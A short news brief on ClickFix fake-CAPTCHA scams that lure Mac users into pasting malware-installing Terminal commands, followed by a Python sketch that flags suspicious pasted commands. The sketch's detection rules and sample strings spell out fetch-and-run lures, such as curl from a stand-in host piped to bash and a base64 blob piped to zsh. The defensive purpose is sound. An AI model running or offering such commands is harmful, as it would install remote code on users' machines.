HeadlinesBriefing.com

Fake CAPTCHA scams target Mac users with ClickFix malware

AppleInsider

Hackers are exploiting Mac users with a new social engineering tactic called ClickFix that disguises malware as CAPTCHA verification prompts. The attack tricks victims into opening Terminal and pasting commands that install malicious software capable of stealing passwords, browser data, and cryptocurrency wallets.

Security researchers first identified ClickFix campaigns in 2024, with detections surging over 500% by 2025. The technique has evolved from Windows-focused attacks to include macOS-specific variants that detect operating systems and display tailored instructions. Recent campaigns use countdown timers, video guides, and clipboard hijacking to increase infection rates.

Unlike traditional malware that relies on downloads, ClickFix shifts execution to the user by having them run commands through legitimate system tools like Terminal. This bypasses many security defenses since the activity appears normal. Security experts emphasize that legitimate CAPTCHA systems never ask users to open command interfaces or paste text, making this the clearest warning sign of a scam.
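As an added illustration (not from AppleInsider or the original article), the sketch below screens text before it is pasted into Terminal and explains why it looks like a ClickFix lure. The rule patterns, thresholds, function names and sample strings are constructed assumptions; the article does not list the commands used in these campaigns.

```python
import re

# Heuristic rules. These are illustrative assumptions, not indicators
# taken from the article: generic "fetch and run" shapes plus lure wording.
RULES = [
    ("pipes output into a shell",
     re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("fetches remote content",
     re.compile(r"\b(?:curl|wget)\b[^\n]*https?://", re.I)),
    ("decodes an encoded blob",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("runs inline AppleScript",
     re.compile(r"\bosascript\s+-e\b")),
    ("carries CAPTCHA-style wording",
     re.compile(r"captcha|not a robot|verif(?:y|ication)", re.I)),
]

def review_paste(text):
    """Return the reasons a pasted Terminal command looks like a lure."""
    return [reason for reason, pattern in RULES if pattern.search(text)]

def verdict(text):
    """'block' on any pipe-to-shell or two findings, 'warn' on one, else 'allow'."""
    reasons = review_paste(text)
    if "pipes output into a shell" in reasons or len(reasons) >= 2:
        return "block"
    return "warn" if reasons else "allow"

# Constructed sample clipboard contents (example.invalid never resolves).
SAMPLES = {
    "lure": "curl -s https://example.invalid/verify | bash  # I am not a robot",
    "encoded": 'echo "Y29uc3RydWN0ZWQ=" | base64 -d | zsh',
    "download": "curl -O https://example.invalid/file.zip",
    "benign": "ls -la ~/Downloads",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name:9} {verdict(text):6} {review_paste(text)}")
```

A legitimate installer one-liner will also trip the pipe-to-shell rule, so the verdict is a prompt to stop and check where the command came from, not proof of malware.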